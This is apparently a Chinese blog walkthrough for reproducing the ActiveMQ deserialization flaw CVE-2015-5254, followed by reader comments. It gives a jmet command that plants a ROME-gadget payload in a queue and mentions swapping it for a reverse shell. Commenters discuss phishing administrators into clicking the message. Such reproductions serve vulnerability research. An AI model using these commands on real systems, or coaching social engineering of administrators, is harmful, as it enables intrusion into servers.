OnionT@KillBoy
1611,491字数 329阅读1分5秒阅读模式
AI智能摘要
你以为ActiveMQ漏洞只能被动等待?CVE-2015-5254反序列化漏洞竟能主动出击!本文揭秘实战复现全过程:无需额外下载ysoserial,仅用jmet工具一键生成ROME链Payload,向目标添加恶意队列。关键来了——当管理员点击消息瞬间,命令执行即刻触发(如创建文件或反弹shell),但实战难点在于如何诱导点击。手把手教你绕过限制,安全研究员必备的渗透技巧,漏洞利用细节与避坑指南全在这里,3分钟掌握核心攻防逻辑。
— AI 生成的文章内容摘要
所需工具jmet 下载地址:https://github.com/matthiaskaiser/jmet/releases
文件下载后在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)
图中敏感信息已经打码,不影响复现
首先访问一下目标web页面,查看是否正常
OK,正常,然后开始复现漏洞,使用jmet,jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME
执行:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 10.1.1.1 61616
此时会给目标ActiveMQ添加一个名为event的队列,我们可以通过http://10.1.1.1:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:
点击查看这条消息即可触发命令执行,此时进入服务器,可见/tmp/success已成功创建,说明漏洞利用成功:
将命令替换成弹shell语句再利用即可成功反弹shell
这里有一点比较鸡肋的是,漏洞的触发要诱导管理员点击那个消息,所以在实战中要就要想办法让管理员点击,或者有管理员弱口令进去也可以
重庆市 1F
这漏洞复现起来还挺麻烦的,external文件夹漏建就报错
浙江省 B1
@ 晨光旧语 external文件夹这坑我踩过,不建直接崩,烦死了
北京市 2F
有人试过用CommonsCollections2链吗?ROME有时候不好使
广西 3F
前几天刚搞完这个,确实得诱导管理员点消息,实战有点难
湖北省武汉市 4F
弹shell那步命令能贴全吗?我这边没反弹成功🤔
重庆市 5F
又是要交互触发的洞,鸡肋得不行
韩国 6F
看图里打码打得挺严实,不过8161端口暴露本身就是问题
广东省东莞市 B1
@ HollowVision 8161端口开外网等于送漏洞,打码也藏不住这问题
浙江省湖州市 7F
我之前也踩过这坑,ysoserial版本不对直接GG
内蒙古包头市 8F
touch成功了但shell没弹,是不是防火墙拦了?
韩国 9F
hh,管理员真会点陌生消息吗,社工得安排上
上海市 B1
@ 糖糖喵喵 管理员要是真点就离谱了,得配合钓鱼邮件才靠谱
广东省广州市 10F
payload发过去队列有了,但点开没执行,啥情况?
广东省佛山市南海区 11F
试了CommonsCollections5链,比ROME稳一点
广东省汕头市 12F
弹shell命令求补全,卡在这一步了😭
四川省成都市 13F
感觉复现文档写得有点跳,中间步骤漏了好几个